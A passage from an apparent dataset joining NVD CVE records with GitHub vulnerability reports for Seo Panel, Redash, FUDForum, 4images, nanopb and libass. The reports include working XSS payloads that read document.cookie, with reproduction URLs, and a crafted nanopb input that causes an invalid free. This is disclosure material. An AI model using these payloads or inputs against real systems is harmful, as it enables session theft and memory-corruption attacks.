"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/206"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162914/Seo-Panel-4.8.0-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/seopanel/Seo-Panel/issues/206"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/seopanel/Seo-Panel/issues/206 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"seopanel",
"Seo-Panel"
] | Hi team,
I would like to report XSS vulnerability.
**Description**
A cross-site scripting (XSS) issue in the SEO admin login panel in version 4.8.0 allows remote attackers to inject JavaScript via the "from_time" parameter.
___
**XSS Payload:** x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
___
**Vulnerable parameter:** from_time
___
**Steps to Reproduce the Issue:**
1- Login to SEO admin panel
2- Add below line at the end:
alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
3- Hover your mouse to "Period" field
As you can see, XSS is triggered and can send cookies to attacker.
___
**Video POC:** https://drive.google.com/file/d/1R_zNhs3nazhL3xZ7R89MTs_fhaIUFkkO/view?usp=sharing
___
**Impact**
With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
| XSS Vulnerablity in "from_time" parameter | https://api.github.com/repos/seopanel/Seo-Panel/issues/206/comments | 0 | 2021-03-11T19:06:01Z | 2021-06-02T16:40:46Z | https://github.com/seopanel/Seo-Panel/issues/206 | 829,441,836 | 206 | 1,765 |
CVE-2020-36144 | 2021-03-18T20:15:13.020 | Redash 8.0.0 is affected by LDAP Injection. There is an information leak through the crafting of special queries, escaping the provided template since the username included in the search filter lacks sanitization. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/getredash/redash/issues/5426"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/getredash/redash/releases"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/getredash/redash/issues/5426"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/getredash/redash/releases"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redash:redash:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E99307EF-9777-4D61-AA36-E2EE410F9561",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"74"
] | 74 | https://github.com/getredash/redash/issues/5426 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"getredash",
"redash"
] | I've tried to contact the security team through `security@redash.io` but had no response. I'm attaching the CVE contents for a proper fix.
Suggested description
> Redash 8.0.0 is affected by LDAP Injection. There is an information leak through the crafting of special queries, escaping the provided template since the username included in the search filter lacks sanitization.
VulnerabilityType Other
> CWE-090: LDAP Injection
Affected Component
> /redash/authentication/ldap_auth.py ->
> (line 45) ldap_user = auth_ldap_user(request.form["email"], request.form["password"])
> (line 71) def auth_ldap_user(username, password)
> (line 86) settings.LDAP_SEARCH_TEMPLATE % {"username": username},
Attack Type
> Remote
Impact Information Disclosure
> true
Attack Vectors
> To exploit this vulnerability, the LDAP Authentication must be enabled, and an attacker has to craft a query escaping the template.
>
> Entry Point: ldap_user = auth_ldap_user(request.form["email"], request.form["password"]) (line 45)
> Since there is no sanitization when it arrives to the actual search function from LDAP (line 86), an special-crafted query can exfiltrate information.
Reference
> https://rules.sonarsource.com/python/type/Vulnerability/RSPEC-2078
> https://owasp.org/www-community/attacks/LDAP_Injection
> https://portswigger.net/kb/issues/00100500_ldap-injection | LDAP Injection | https://api.github.com/repos/getredash/redash/issues/5426/comments | 3 | 2021-03-14T02:16:09Z | 2024-02-01T19:57:52Z | https://github.com/getredash/redash/issues/5426 | 831,046,370 | 5,426 | 1,766 |
CVE-2021-27519 | 2021-03-19T19:15:13.913 | A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fudforum/FUDforum/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/fudforum/FUDforum/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F38C9CCE-ABB8-4093-9EED-D11EF11F8B07",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/fudforum/FUDforum/issues/2 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"fudforum",
"FUDforum"
] | **What is XSS**
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end-user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
**Affected Version**- 3.1.0
Demo installation: https://localhost/fudforum/
___
# XSS 1
**Vulnerable parameter**- srch
**Vulnerable UR**L- https://localhost/fudforum/index.php?SQ=a5b48c6fe751b3278e1627b975b97beb&btn_submit=&srch=<XSS PAYLOAD>&t=search
**Steps to reproduce the bug**:
1- goto https://localhost/fudforum/index.php?t=search&
2- In "forum search" option, paste XSS payload
XSS payload: x" onmouseover=alert(1) x="
3- Hover your mouse to "x" and XSS will get triggered
**Video POC**: https://drive.google.com/file/d/19M4cGB-fL5V_fPJ7tsxlfv6WKgNYDqla/view?usp=sharing
___
# XSS 2
**vulnerable parameter**- author
**Vulnerable URL**- https://localhost/fudforum/index.php?SQ=895de6292fa97eaee3e94fad7f3e1884&t=search&srch=&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=<XSS PAYLOAD>
**Steps to reproduce the bug**:
1- goto https://localhost/fudforum/index.php?t=search&
2- In the "Filter by User" search option, paste XSS payload
XSS payload: y" onmouseover=alert(2) y="
3- Hover your mouse to "y" and XSS will get triggered
**Video POC**: https://drive.google.com/file/d/16HfYLKXvoDSOMdi_ysH708X95IDvxuDq/view?usp=sharing
___
**Impact of XSS**:
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
- Perform any action within the application that the user can perform.
- View any information that the user is able to view.
- Modify any information that the user is able to modify.
- Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
- With the help of XSS a hacker or attacker can perform social engineering on users by redirecting them from real website to fake one. hacker can steal their cookies and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
| Cross Site Scripting | https://api.github.com/repos/fudforum/FUDforum/issues/2/comments | 1 | 2021-02-17T07:30:23Z | 2021-03-18T20:10:00Z | https://github.com/fudforum/FUDforum/issues/2 | 809,934,824 | 2 | 1,767 |
CVE-2021-27308 | 2021-03-22T15:15:14.160 | A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162946/4Images-1.8-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/4images/4images/issues/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162946/4Images-1.8-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/4images/4images/issues/3"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:4homepages:4images:1.8:*:*:*:*:*:*:*",
"matchCriteriaId": "8D15DA7C-22D1-4281-951E-FD4F5BA2BE54",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/4images/4images/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"4images",
"4images"
] | **Vulnerable parameter**: redirect
**XSS sample Payload**: '"()%26%25<e><ScRiPt%20>alert(document.cookie)</ScRiPt>
**Steps to reproduce the vulnerability(POC)**:
1- Goto 4images admin panel page (demo instance:https://localhost/4images/admin/index.php)
2- Enter the credentials , Turn on the intercept and click on "Login"
3- copy paste the XSS payload after `redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE`
4-Forward the request and you can see XSS is triggered.
**Video POC**: https://drive.google.com/file/d/12T39ZCqpbdz29gKptIdPnNHy1Nudr9Cs/view?usp=sharing
**Impact**:
With the help of xss attacker can perform social engineering on users by redirecting them from a real website to a fake ones. Attacker can steal their cookies leading to account takeover and download malware on their system, and there are many more attacking scenarios a skilled attacker can perform with XSS. | 4images v1.8 - 'Admin panel login' Cross-Site Scripting | https://api.github.com/repos/4images/4images/issues/3/comments | 1 | 2021-02-13T12:30:30Z | 2022-10-02T12:45:28Z | https://github.com/4images/4images/issues/3 | 807,740,811 | 3 | 1,768 |
CVE-2021-21401 | 2021-03-23T18:15:13.160 | Nanopb is a small code-size Protocol Buffers implementation in ansi C. In Nanopb before versions 0.3.9.8 and 0.4.5, decoding a specifically formed message can cause invalid `free()` or `realloc()` calls if the message type contains an `oneof` field, and the `oneof` directly contains both a pointer field and a non-pointer field. If the message data first contains the non-pointer field and then the pointer field, the data of the non-pointer field is incorrectly treated as if it was a pointer value. Such message data rarely occurs in normal messages, but it is a concern when untrusted data is parsed. This has been fixed in versions 0.3.9.8 and 0.4.5. See referenced GitHub Security Advisory for more information including workarounds. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/blob/c9124132a604047d0ef97a09c0e99cd9bed2c818/CHANGELOG.txt#L1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/commit/e2f0ccf939d9f82931d085acb6df8e9a182a4261"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/issues/647"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/security/advisories/GHSA-7mv5-5mxh-qg88"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/blob/c9124132a604047d0ef97a09c0e99cd9bed2c818/CHANGELOG.txt#L1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/commit/e2f0ccf939d9f82931d085acb6df8e9a182a4261"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/issues/647"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/nanopb/nanopb/security/advisories/GHSA-7mv5-5mxh-qg88"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nanopb_project:nanopb:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A39AC3AB-38B5-453C-B7A8-AC4B55CA26B3",
"versionEndExcluding": "0.3.9.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:nanopb_project:nanopb:*:*:*:*:*:*:*:*",
"matchCriteriaId": "751F562A-CABC-4E22-A0A3-12BF6171B6AE",
"versionEndExcluding": "0.4.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "0.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"763"
] | 763 | https://github.com/nanopb/nanopb/issues/647 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nanopb",
"nanopb"
] | This affects `0.3.9.7` (and probably lower versions, though I haven't checked) with `PB_ENABLE_MALLOC` enabled.
Specially crafted bytes can make `pb_decode` eventually call `pb_free` on an arbitrary pointer. Here's the smallest repro case I could make:
```cpp
/*
// Equivalent to:
syntax = "proto3";
message Repro {
oneof value_type {
bool boolean_value = 1;
string bytes_value = 5;
}
}
*/
typedef struct _Repro {
pb_size_t which_value_type;
union {
bool boolean_value;
pb_bytes_array_t *bytes_value;
};
} Repro;
const pb_field_t Repro_fields[] = {
PB_ANONYMOUS_ONEOF_FIELD(value_type, 1, BOOL , ONEOF, STATIC , FIRST, Repro, boolean_value, boolean_value, 0),
PB_ANONYMOUS_ONEOF_FIELD(value_type, 5, BYTES , ONEOF, POINTER , UNION, Repro, bytes_value, bytes_value, 0),
PB_LAST_FIELD
};
int main() {
const uint8_t bytes[] = {0x08, 0x08, 0x2d};
size_t size = 3;
pb_istream_t stream = pb_istream_from_buffer(bytes, size);
Repro repro{};
pb_decode(&stream, Repro_fields, &repro);
}
```
Running this leads to:
```
malloc: *** error for object 0x1: pointer being freed was not allocated
```
I can repro this on both Linux and Mac.
What I believe happens is:
* the first two bytes are interpreted as `boolean_value` and result in [`iter.pData`](https://github.com/nanopb/nanopb/blob/c2d43e59d8ec880ed261366818f0cacc5c8cc2e6/pb_decode.c#L478) being [set to `1`](https://github.com/nanopb/nanopb/blob/c2d43e59d8ec880ed261366818f0cacc5c8cc2e6/pb_decode.c#L1328);
* the third byte is interpreted as a field tag referring to `bytes_value`. Because there are no more bytes in the input, decoding the field fails (with `end-of-stream`). However, the current field is reset to `5` from `1` while `iter.pData` is not cleared and is still set to `1`;
* seeing that decoding failed, `pb_decode` tries to release the message. `pb_release_single_field`, thinking that the current field is `5`, considers the contents of `iter.pData` to refer to a dynamically-allocated array and [calls `pb_free` on it](https://github.com/nanopb/nanopb/blob/c2d43e59d8ec880ed261366818f0cacc5c8cc2e6/pb_decode.c#L1243).
I'm not sure what the right fix would be -- perhaps `iter.pData` should be set to null when oneof fields are switched, or perhaps the current field should not be changed until it is successfully parsed?
Note that this is a potential security issue. I presume that if the first field was an integer, an arbitrary value could be written to it which would then be interpreted as an address and passed to `free`.
Note: this was found by OSS-Fuzz on Firestore (note that I have trimmed down the repro case from the original). | Ill-formed oneof message leads to calling free on an arbitrary pointer | https://api.github.com/repos/nanopb/nanopb/issues/647/comments | 3 | 2021-03-20T00:14:28Z | 2021-03-22T17:46:41Z | https://github.com/nanopb/nanopb/issues/647 | 836,515,067 | 647 | 1,769 |
CVE-2020-24994 | 2021-03-23T20:15:13.073 | Stack overflow in the parse_tag function in libass/ass_parse.c in libass before 0.15.0 allows remote attackers to cause a denial of service or remote code execution via a crafted file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/422"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/422#issuecomment-806002919"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/423"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/commit/6835731c2fe4164a0c50bc91d12c43b2a2b4e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/422"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/422#issuecomment-806002919"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/libass/libass/issues/423"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libass_project:libass:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EFE0DEE3-A9C6-4008-BB80-4B5A6D9B0B4E",
"versionEndExcluding": "0.15.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/libass/libass/issues/422 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"libass",
"libass"
] | **Description**
A vulnerability was found in function parse_tag in ass_parse.c:234 ,which allow attackers to cause a denial of service or remote code execution via a crafted file.
test@test:~/libass-0.14.0/afl$ ./a.out crash/poc
======================= INFO =========================
This binary is built for AFL-fuzz.
To run the target function on individual input(s) execute this:
./a.out < INPUT_FILE
or
./a.out INPUT_FILE1 [INPUT_FILE2 ... ]
To fuzz with afl-fuzz execute this:
afl-fuzz [afl-flags] ./a.out [-N]
```
afl-fuzz will run N iterations before re-spawning the process (default: 1000)
======================================================
Reading 50635 bytes from crash/poc
ASAN:DEADLYSIGNAL
=================================================================
==64283==ERROR: AddressSanitizer: stack-overflow on address 0x7fff99b2bff8 (pc 0x00000046724b bp 0x7fff99b2fcf0 sp 0x7fff99b2c000 T0)
#0 0x46724a in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:234
#1 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#2 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#3 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#4 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#5 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#6 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#7 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#8 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#9 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#10 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#11 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#12 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#13 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#14 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#15 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#16 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#17 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#18 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#19 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#20 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#21 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#22 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#23 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#24 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#25 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#26 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#27 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#28 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#29 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#30 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
#31 0x4737a1 in parse_tag /home/test/libass-0.14.0/libass/ass_parse.c:654
